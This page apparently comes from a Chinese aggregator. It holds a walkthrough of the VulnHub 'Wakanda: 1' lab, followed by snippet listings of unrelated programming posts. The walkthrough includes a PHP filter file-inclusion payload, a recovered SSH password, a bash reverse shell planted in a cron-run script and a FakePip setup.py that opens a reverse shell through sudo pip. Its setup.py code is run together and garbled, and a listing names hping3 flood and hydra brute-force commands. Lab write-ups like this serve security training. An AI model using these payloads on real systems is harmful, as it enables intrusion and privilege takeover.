当前位置：首页 > news >正文

Wakanda: 1靶场复现【附代码】(权限提升)

news 2025/7/9 0:37:27

靶机下载地址：

wakanda: 1 ~ VulnHubwakanda: 1, made by xMagass. Download & walkthrough links are available.https://www.vulnhub.com/entry/wakanda-1,251/#download

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:DB:19:70'

1.2. 端口扫描

nmap 192.168.7.171 -p- -A

1.3. 目录扫描

dirb http://192.168.7.171

1.4. 敏感信息收集

whatweb http://192.168.7.171

2. WEB打点寻找漏洞点

2.1. 访问80端口

1.进了主页面，老规矩随便点点功能点，网页底线有些邮箱信息【mamadou】，暂时没实际用途 -> 查看网站源代码，有提示

2.拼接/?lang=fr试试看，没事大变换，但是url可能存在文件包含漏洞

3.尝试读取拼接路径读取网站源码

/?lang=php://filter/convert.base64-encode/resource=index

直接看网站源代码方便一些 -> 疑似base64加密 -> 解密得到密码

Niamey4Ever227!!!

2.2. SSH登录-GetShell

尝试用得到的密码搭配着邮箱信息登陆一下 -> 登录成功

mamadou:Niamey4Ever227!!!

切换至shell窗口

3. 权限提升

1查看当前用户的命令权限，没权限看 -> 查看内核版本，没有找到合适的提权方式

sudo -l
uname -a

2.在passwd中发现另一个用户 devops

3进入devops根目录，查看flag2文件，没有权限

4.看看其他关联文件

find / -user devops 2>/dev/null

发现 /srv/.antivirus.py 文件会将内容写入到 /tmp/test 中

cat /srv/.antivirus.py
open('/tmp/test','w').write('test')

将内容修改一下，尝试执行反弹shell

vi /srv/.antivirus.py
import os
os.system("echo 'bash -i >& /dev/tcp/192.168.7.36/4444 0>&1'|bash")

5.打开kali的监听【因为是计划任务稍等一会就会上线】

nc -lvvp 4444

查看第二个flag文件

6.查看当前用户的命令权限 -> 是all，尝试直接提权 -> 不大行

sudo -l
sudo su

7.网上找了一个相干的exp，创建一个setup.py，在其中写入

from setuptools import setup
from setuptools.command.install import install
import base64
import osclass CustomInstall(install):def run(self):install.run(self)RHOST = '192.168.7.36' reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 8888; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOSTencoded = base64.b64encode(reverse_shell)os.system('echo %s|base64 -d|bash' % encoded)setup(name='FakePip',version='0.0.1',description='This will exploit a sudoer able to /usr/bin/pip install *',url='https://github.com/0x00-0x00/fakepip',author='zc00l',author_email='andre.marques@esecurity.com.br',license='MIT',zip_safe=False,cmdclass={'install': CustomInstall})

修改为kali的ip

开启临时web服务，将其下载到 /tmp 目录中

wget http://192.168.7.36:8001/setup.py

kali开启监听

nc -lvnp 8888

靶机执行命令，成功反弹shell，提权成功

sudo /usr/bin/pip install . --upgrade --force-reinstall

Wakanda: 1靶场复现【附代码】(权限提升)

靶机下载地址： wakanda: 1 ~ VulnHubwakanda: 1, made by xMagass. Download & walkthrough links are available.https://www.vulnhub.com/entry/wakanda-1,251/#download 1. 主机发现端口扫描目录扫描敏感信息获取 1.1. 主机发现 nmap -sn 192.168.7.0/24…...

编程日记 2024/8/11 4:37:18

内核函数调试

要进入 bind 函数的内部进行调试，实际上是不能直接在用户空间代码中进入内核内部的 bind 实现，因为 bind 是一个系统调用，它由内核处理。尽管如此，你可以通过以下几种方法来间接调试 bind 函数并理解它的行为： 1. 使用…...

编程日记 2024/8/11 4:36:17

Spring IOC使用DButil实现对数据库的操作

一、DButil、lombok、junit的简单介绍 1.dbutil dbutil是由阿帕奇提供操作数据库的插件，其核心类为QueryRunner，存在方法 .query() 查询，.update() 增删改；  <dependency><groupId>commons-d…...

编程日记 2024/8/11 4:34:15

Android14音频进阶调试之命令播放mp3/aac非裸流音频(八十)

简介： CSDN博客专家，专注Android/Linux系统，分享多mic语音方案、音视频、编解码等技术，与大家一起成长！新书发布：《Android系统多媒体进阶实战》🚀 优质专栏： Audio工程师进阶系列【原创干货持续更新中……】🚀 优质专栏：多媒体系统工程师系列【原创干货持续更…...

编程日记 2024/8/11 4:33:14

vue中怎么自定义组件

目录一：功能描述二：实现过程一：功能描述在开发过程中我们经常需要自定义组件完成特定的功能，比如用户详情页，我增加一个调整余额的按钮，点击以后需要打开一个调整余额对话框，输入调整的金…...

编程日记 2024/8/11 4:31:12

BM1反转链表[栈+头插法]

题目要求如下: 问题比较简单,就是将链表中的值进行反转即可。一种比较简单的方式是使用栈链表的方式来实现,下面是相应的代码: #include <stdio.h> #include <stdlib.h> int arr[10001] {0}; struct ListNode* ReverseList(struct ListNode* head ) {if (head …...

编程日记 2024/8/11 4:28:09

VisionPro二次开发学习笔记10-使用 PMAlign和Fixture固定Blob工具检测孔

使用 PMAlign和Fixture固定Blob工具检测孔这个示例演示了如何使用 PMAlign 工具和 Fixture 工具来夹持一个 Blob 工具。示例代码将检测支架右上角孔的存在。当点击运行按钮时，将读取新图像。PMAlign 工具运行并生成一个 POSE 作为输出。POSE 是一个六自由度的变换…...

编程日记 2024/8/11 4:26:07

学单片机怎么在3-5个月内找到工作？

每个初学者，都如履薄冰，10几年前，我自学单片机时，也一样。想通过学习，找一份体面点的工作，又害怕辛辛苦苦学出来，找不到工作。好在，当初执行力，还算可以，自…...

编程日记 2024/8/11 4:25:07

探索设计模式：观察者模式

探索设计模式：观察者模式 🧐观察者模式简介:gem:核心概念:rainbow:观察者模式的优点:truck:实现步骤1. 定义主题接口2. 实现观察者接口3. 具体主题实现4. 具体观察者实现5. 调用 :triangular_flag_on_post:总结在实际开发过程中，设计模式的作…...

编程日记 2024/8/11 4:24:06

gradio之持续输入，持续输出（流式）

流式输出yield,比如一个输出控件，想要实时显示内容，用return for循环一次就返回去了。而用yield会持续更新往下执行 for i in range(length):time.sleep(8)yield 总共str(length)条语料，已运行str(i1)条在Gradio中，某些组件&am…...

编程日记 2024/8/11 4:22:03

Git 常用命令指南：从入门到精通

文章目录前言1. 初始化一个Git仓库2. 克隆远程仓库3. 查看仓库状态4. 添加文件到暂存区5. 提交代码6. 推送到远程仓库7. 拉取远程仓库的更改8. 分支管理9. 查看提交历史10. 回退到某个版本结语前言如果你是一位开发者或者对代码感兴趣，那么你一定听说过Git。Git…...

编程日记 2024/8/11 4:21:01

Camera驱动汇总表【小驰行动派】

在做Camera BringUp的时候，如果有已经点亮过的驱动源码，对我们的帮助将会非常的大，可以大大加快我们点亮进度。所以我决定整理汇总接触过得Camera驱动信息。如果你刚好有需要，可以加我薇咨询（该资料整理比较花时间&a…...

编程日记 2024/8/11 4:20:01

SSRS rdlc报表九在.net core中使用RDLC报表

开发环境 vs 2022企业版 SqlServer数据库 Win11 前言 rdlc报表在aspx中集成的很好，很容易实现，并且功能强大，但随着技术的发展，aspx慢慢的被淘汰，现在已经发展到.net8了，aspx基本上很少用，出的新框架基本上也都是前后端分离，没了aspx的控件加持，rdlc这么厉害的报…...

编程日记 2024/8/11 4:18:59

力扣（2024.08.10）

1. 222：完全二叉树的节点个数 # Definition for a binary tree node. # class TreeNode: # def __init__(self, val0, leftNone, rightNone): # self.val val # self.left left # self.right right class Solution:def countNodes(…...

编程日记 2024/8/11 4:16:57

Django-文件上传

## Django文件上传需要考虑的重要事项 > 文件或图片一般通过表单进行。用户在前端点击文件上传，然后以POST方式将数据和文件提交到服务器。服务器在接收到POST请求后需要将其存储在服务器上的某个地方。Django默认的存储地址是相对于根目录的/media/文件夹&…...

编程日记 2024/8/11 4:14:53

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp00f自动化权限提升+Tmux进程劫持权限提升

信息收集 IP AddressOpening Ports10.10.10.79TCP:22,80,443 $ nmap 10.10.10.79 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 96:4c:51:42:…...

编程日记 2024/8/11 4:11:45

利用单张/多张图内参数标定 OpenCV Python

E:\OpenCV_py_ws\opencv相机标定\图片\calib-JT.py #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2023/11/21 16:05 # @File : calib.py # @Software: import cv2 import numpy as np import glob from datetime import datetimenp.set_printoptions(supp…...

编程日记 2024/8/11 4:10:43

The Llama 3 Herd of Models 第7部分视觉实验部分全文

第1,2,3部分，介绍、概览和预训练第4部分，后训练第5部分，结果第6部分，推理 7 Vision Experiments 我们进行了一系列的实验，在这些实验中，我们通过一种由两个主要阶段组成的合成方法将视觉识别能力整合到Llama 3中。首先，我们通过在大量图像-文本对上引入和训练两种…...

编程日记 2024/8/11 4:09:41

亚信安慧AntDB-T：使用Brin索引提升OLAP查询性能以及节省磁盘空间

前言在这个信息量爆炸的时代，数据库面临着海量数据的挑战，如何提升OLAP业务的查询性能、如何节省磁盘空间等问题已经成为了数据库的痛点之所在。本篇着重介绍亚信安慧AntDB-T中Brin索引的实现过程以及应用在OLAP业务中带来的性能提升和存储降低。亚…...

编程日记 2024/8/11 4:08:39

web渗透测试常用命令

Web Application TTPs HPING3 DoS hping3 targetiP --flood --frag --spoof ip --destport # --synHydra Online Brute Force hydra -1 ftp -P words -v targetiP ftpDownload HTTP File and Execute...

编程日记 2024/8/11 4:07:38

Admin.Net中的消息通信SignalR解释

定义集线器接口 IOnlineUserHub public interface IOnlineUserHub {/// 在线用户列表Task OnlineUserList(OnlineUserList context);/// 强制下线Task ForceOffline(object context);/// 发布站内消息Task PublicNotice(SysNotice context);/// 接收消息Task ReceiveMessage(…...

编程新知 2025/7/6 2:27:06

Swift 协议扩展精进之路：解决 CoreData 托管实体子类的类型不匹配问题（下）

概述在 Swift 开发语言中，各位秃头小码农们可以充分利用语法本身所带来的便利去劈荆斩棘。我们还可以恣意利用泛型、协议关联类型和协议扩展来进一步简化和优化我们复杂的代码需求。不过，在涉及到多个子类派生于基类进行多态模拟的场景下，…...

编程新知 2025/7/7 7:23:14

线程与协程

1. 线程与协程 1.1. “函数调用级别”的切换、上下文切换 1. 函数调用级别的切换 “函数调用级别的切换”是指：像函数调用/返回一样轻量地完成任务切换。举例说明： 当你在程序中写一个函数调用： funcA() 然后 funcA 执行完后返回&…...

编程新知 2025/6/16 12:40:21

【磁盘】每天掌握一个Linux命令 - iostat

目录【磁盘】每天掌握一个Linux命令 - iostat工具概述安装方式核心功能基础用法进阶操作实战案例面试题场景生产场景注意事项【磁盘】每天掌握一个Linux命令 - iostat 工具概述 iostat（I/O Statistics）是Linux系统下用于监视系统输入输出设备和CPU使…...

编程新知 2025/6/21 8:10:07

高等数学（下）题型笔记（八）空间解析几何与向量代数

目录 0 前言 1 向量的点乘 1.1 基本公式 1.2 例题 2 向量的叉乘 2.1 基础知识 2.2 例题 3 空间平面方程 3.1 基础知识 3.2 例题 4 空间直线方程 4.1 基础知识 4.2 例题 5 旋转曲面及其方程 5.1 基础知识 5.2 例题 6 空间曲面的法线与切平面 6.1 基础知识 6.2…...

编程新知 2025/7/8 1:58:22

鸿蒙中用HarmonyOS SDK应用服务 HarmonyOS5开发一个医院查看报告小程序

一、开发环境准备工具安装： 下载安装DevEco Studio 4.0（支持HarmonyOS 5）配置HarmonyOS SDK 5.0确保Node.js版本≥14 项目初始化： ohpm init harmony/hospital-report-app 二、核心功能模块实现 1. 报告列表…...

编程新知 2025/6/19 5:45:52